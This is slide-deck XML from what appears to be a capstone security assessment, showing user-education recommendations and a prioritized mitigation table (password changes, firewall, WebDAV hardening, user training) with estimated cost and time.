              <a:t>Tips for navigating complex directories/servers</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="➢"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>Common phishing and social engineering tactics</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="➢"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>Do’s and Don’ts for security of PII (customer data)</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="➢"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>What executable code looks like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460" name="Google Shape;1460;p89"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4466800" y="1604700"/>
            <a:ext cx="4988100" cy="3301800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="0" lIns="457200" spcFirstLastPara="1" rIns="457200" wrap="square" tIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="➢"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1800"/>
              <a:t>Regularly test system users</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t> to ensure knowledge has been retained and is in use. Repeat training for those not in compliance</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>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b="1" lang="en" sz="1800"/>
              <a:t>Conduct training updates as needed, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>perhaps quarterly</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1800"/>
            </a:br>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="➢"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1800"/>
              <a:t>Encourage ongoing dialogue</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t> about best practices for the company</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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1461" name="Google Shape;1461;p89"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="400050" y="847725"/>
            <a:ext cx="2762400" cy="590400"/>
            <a:chOff x="400050" y="847725"/>
            <a:chExt cx="2762400" cy="590400"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1462" name="Google Shape;1462;p89"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="400050" y="847725"/>
              <a:ext cx="2762400" cy="590400"/>
            </a:xfrm>
            <a:prstGeom prst="wedgeRoundRectCallout">
              <a:avLst>
                <a:gd fmla="val -20833" name="adj1"/>
                <a:gd fmla="val 62500" name="adj2"/>
                <a:gd fmla="val 0" name="adj3"/>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9"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="711550" y="884025"/>
              <a:ext cx="191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Educa</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en" sz="2400">
                  <a:solidFill>
                    <a:schemeClr val="lt2"/>
                  </a:solidFill>
                  <a:latin typeface="Roboto"/>
                  <a:ea typeface="Roboto"/>
                  <a:cs typeface="Roboto"/>
                  <a:sym typeface="Roboto"/>
                </a:rPr>
                <a:t>tion</a:t>
              </a:r>
              <a:endParaRPr sz="2600">
                <a:solidFill>
                  <a:schemeClr val="lt2"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1464" name="Google Shape;1464;p89"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4905375" y="847725"/>
            <a:ext cx="2762400" cy="590400"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd fmla="val -20833" name="adj1"/>
              <a:gd fmla="val 62500" name="adj2"/>
              <a:gd fmla="val 0" name="adj3"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="1D7E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Accountability</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:schemeClr val="lt2"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1465" name="Google Shape;1465;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469" name="Shape 1469"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1470" name="Google Shape;1470;p90"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="274322" y="289913"/>
            <a:ext cx="8595295" cy="4593614"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1471" name="Google Shape;1471;p90"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="320375" y="1724225"/>
            <a:ext cx="8503200" cy="18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90"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="274350" y="1903550"/>
            <a:ext cx="8595300" cy="1800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134F5C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Prioritizing</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:srgbClr val="134F5C"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3400">
                <a:solidFill>
                  <a:srgbClr val="134F5C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Recommendations for Implementation</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="5200">
              <a:solidFill>
                <a:srgbClr val="134F5C"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1473" name="Google Shape;1473;p9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134F5C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Recommendations for Capstone Security Prioritization</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="134F5C"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1479" name="Google Shape;1479;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graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="1480" name="Google Shape;1480;p91"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="348963" y="768413"/>
          <a:ext cx="3000000" cy="3000000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:noFill/>
                <a:tableStyleId>{43937092-1D85-4520-81C4-1C38C2314272}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="532375"/>
                <a:gridCol w="2553925"/>
                <a:gridCol w="1173675"/>
                <a:gridCol w="1742050"/>
                <a:gridCol w="2256775"/>
              </a:tblGrid>
              <a:tr h="815125">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:t/>
                      </a:r>
                      <a:endParaRPr b="1"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr">
                    <a:lnL cap="flat" cmpd="sng" w="9525">
                      <a:solidFill>
                        <a:schemeClr val="dk2"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="sm" w="sm" type="none"/>
                      <a:tailEnd len="sm" w="sm" type="none"/>
                    </a:lnL>
                    <a:solidFill>
                      <a:srgbClr val="93C47D"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="1800"/>
                        <a:t>Mitigation Strategy </a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="1800"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr">
                    <a:solidFill>
                      <a:srgbClr val="93C47D"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="1700"/>
                        <a:t>Difficulty</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="1700"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr">
                    <a:solidFill>
                      <a:srgbClr val="93C47D"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="1800"/>
                        <a:t>Probable Cost </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" sz="1500"/>
                        <a:t>(estimated)</a:t>
                      </a:r>
                      <a:endParaRPr sz="1500"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr">
                    <a:solidFill>
                      <a:srgbClr val="93C47D"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="1800"/>
                        <a:t>Time Required </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" sz="1500"/>
                        <a:t>(estimated)</a:t>
                      </a:r>
                      <a:endParaRPr sz="1500"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr">
                    <a:solidFill>
                      <a:srgbClr val="93C47D"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="815125">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="3400">
                          <a:solidFill>
                            <a:schemeClr val="dk2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>1</a:t>
                      </a:r>
                      <a:endParaRPr sz="3400">
                        <a:solidFill>
                          <a:schemeClr val="dk2"/>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t>Edit employee info, </a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en" sz="1800"/>
                      </a:br>
                      <a:r>
                        <a:rPr lang="en" sz="1800"/>
                        <a:t>change passwords</a:t>
                      </a:r>
                      <a:endParaRPr sz="18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700"/>
                        <a:t>Low</a:t>
                      </a:r>
                      <a:endParaRPr sz="17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t>$0</a:t>
                      </a:r>
                      <a:endParaRPr sz="18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t>30 minutes</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr">
                    <a:lnB cap="flat" cmpd="sng" w="9525">
                      <a:solidFill>
                        <a:srgbClr val="9E9E9E"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="sm" w="sm" type="none"/>
                      <a:tailEnd len="sm" w="sm" type="none"/>
                    </a:lnB>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="815125">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:schemeClr val="dk1"/>
                        </a:buClr>
                        <a:buSzPts val="1100"/>
                        <a:buFont typeface="Arial"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="3400">
                          <a:solidFill>
                            <a:schemeClr val="dk2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>2</a:t>
                      </a:r>
                      <a:endParaRPr sz="1200">
                        <a:solidFill>
                          <a:schemeClr val="dk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800"/>
                        <a:t>Firewall installation, configuration </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" sz="1500"/>
                        <a:t>(to block port scanning and more)</a:t>
                      </a:r>
                      <a:endParaRPr sz="15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700"/>
                        <a:t>Medium</a:t>
                      </a:r>
                      <a:endParaRPr sz="17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800"/>
                        <a:t>$1k - $5k </a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en" sz="1800"/>
                      </a:br>
                      <a:r>
                        <a:rPr lang="en" sz="1800"/>
                        <a:t>  and up</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800"/>
                        <a:t>1 - 2 days</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815125">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:schemeClr val="dk1"/>
                        </a:buClr>
                        <a:buSzPts val="1100"/>
                        <a:buFont typeface="Arial"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="3400">
                          <a:solidFill>
                            <a:schemeClr val="dk2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>3</a:t>
                      </a:r>
                      <a:endParaRPr sz="1200">
                        <a:solidFill>
                          <a:schemeClr val="dk2"/>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800"/>
                        <a:t>Improve WebDAV security</a:t>
                      </a:r>
                      <a:endParaRPr sz="18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700"/>
                        <a:t>Medium</a:t>
                      </a:r>
                      <a:endParaRPr sz="17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800"/>
                        <a:t>Varies for </a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en" sz="1800"/>
                      </a:br>
                      <a:r>
                        <a:rPr lang="en" sz="1800"/>
                        <a:t>  businesses</a:t>
                      </a:r>
                      <a:endParaRPr sz="18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800"/>
                        <a:t>1 week - 1 month</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr">
                    <a:lnT cap="flat" cmpd="sng" w="9525">
                      <a:solidFill>
                        <a:srgbClr val="9E9E9E"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="sm" w="sm" type="none"/>
                      <a:tailEnd len="sm" w="sm" type="none"/>
                    </a:lnT>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="698175">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:schemeClr val="dk1"/>
                        </a:buClr>
                        <a:buSzPts val="1100"/>
                        <a:buFont typeface="Arial"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="3400">
                          <a:solidFill>
                            <a:schemeClr val="dk2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>4</a:t>
                      </a:r>
                      <a:endParaRPr sz="1200">
                        <a:solidFill>
                          <a:schemeClr val="dk2"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr">
                    <a:solidFill>
                      <a:srgbClr val="D9EAD3"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>User cyber education</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr">
                    <a:solidFill>
                      <a:srgbClr val="D9EAD3"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1700">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Low</a:t>
                      </a:r>
                      <a:endParaRPr sz="1700"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr">
                    <a:solidFill>
                      <a:srgbClr val="D9EAD3"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1800"/>
                        <a:t>Free - $5k</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr">
                    <a:solidFill>
                      <a:srgbClr val="D9EAD3"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1800"/>
                        <a:t>Ongoing</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr">
                    <a:solidFill>
                      <a:srgbClr val="D9EAD3"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1481" name="Google Shape;1481;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100">
                <a:solidFill>
                  <a:srgbClr val="134F5C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Recommendations for Capstone Security Prioritization, continued</a:t>
            </a:r>
            <a:endParaRPr sz="2100">
              <a:solidFill>
                <a:srgbClr val="134F5C"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1487" name="Google Shape;1487;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graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="1488" name="Google Shape;1488;p92"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="348963" y="768413"/>
          <a:ext cx="3000000" cy="3000000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:noFill/>
                <a:tableStyleId>{43937092-1D85-4520-81C4-1C38C2314272}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="527125"/>
                <a:gridCol w="2535750"/>
                <a:gridCol w="1151900"/>
                <a:gridCol w="1747125"/>
                <a:gridCol w="2206500"/>
              </a:tblGrid>
              <a:tr h="535650">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:t/>
                      </a:r>
                      <a:endParaRPr b="1"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr">
                    <a:solidFill>
                      <a:srgbClr val="93C47D"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="1800"/>
                        <a:t>Mitigation Strategy </a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="1800"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr">
                    <a:lnR cap="flat" cmpd="sng" w="9525">
                      <a:solidFill>
                        <a:srgbClr val="9E9E9E"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="sm" w="sm" type="none"/>
                      <a:tailEnd len="sm" w="sm" type="none"/>
                    </a:lnR>
                    <a:solidFill>
                      <a:srgbClr val="93C47D"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="1700"/>
                        <a:t>Difficulty</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="17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lang="en" sz="1800"/>
                        <a:t>Probable Cost </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" sz="1500"/>
                        <a:t>(estimated)</a:t>
                      </a:r>
                      <a:endParaRPr sz="15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lang="en" sz="1800"/>
                        <a:t>Time Required </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" sz="1500"/>
                        <a:t>(estimated)</a:t>
                      </a:r>
                      <a:endParaRPr sz="15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3C47D"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="723150">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:schemeClr val="dk1"/>
                        </a:buClr>
                        <a:buSzPts val="1100"/>
                        <a:buFont typeface="Arial"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="3400">
                          <a:solidFill>
                            <a:schemeClr val="dk2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>5</a:t>
                      </a:r>
                      <a:endParaRPr sz="1200"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
